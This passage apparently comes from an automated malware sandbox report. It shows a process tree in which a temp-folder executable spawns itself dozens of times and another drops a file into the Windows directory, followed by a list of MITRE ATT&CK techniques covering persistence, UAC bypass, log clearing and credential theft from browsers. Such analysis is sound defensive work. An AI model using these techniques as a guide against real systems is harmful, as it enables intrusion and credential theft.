  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10848
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10856
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10864
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10872
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10880
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10888
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10896
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10904
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10912
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10920
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10928
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10936
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10944
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10952
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10960
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10968
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10976
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10984
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:10992
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11000
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11008
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11016
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11024
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11032
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11040
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11048
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11056
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11064
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11072
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11080
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11088
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11096
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11104
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11112
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11120
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11128
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11136
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11144
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11152
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11160
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11168
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11176
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11184
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11196
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11204
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11212
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11220
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11228
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11236
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11244
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11252
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11260
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11272
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11280
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11288
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11296
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11304
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11312
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11320
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11328
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11336
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11348
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11360
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11372
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11380
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11388
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11396
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11404
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11412
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11420
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11428
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11436
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11444
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11452
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11460
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11468
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11476
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11484
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11492
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11500
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11508
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11524
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11532
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:11548
- - C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe
    "C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"
    3⤵
    - Drops file in Windows directory
    PID:11540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3524

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3944

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4056

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1716

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:2624

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2720

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4596
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3428 -ip 3428
  2⤵
  PID:4944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion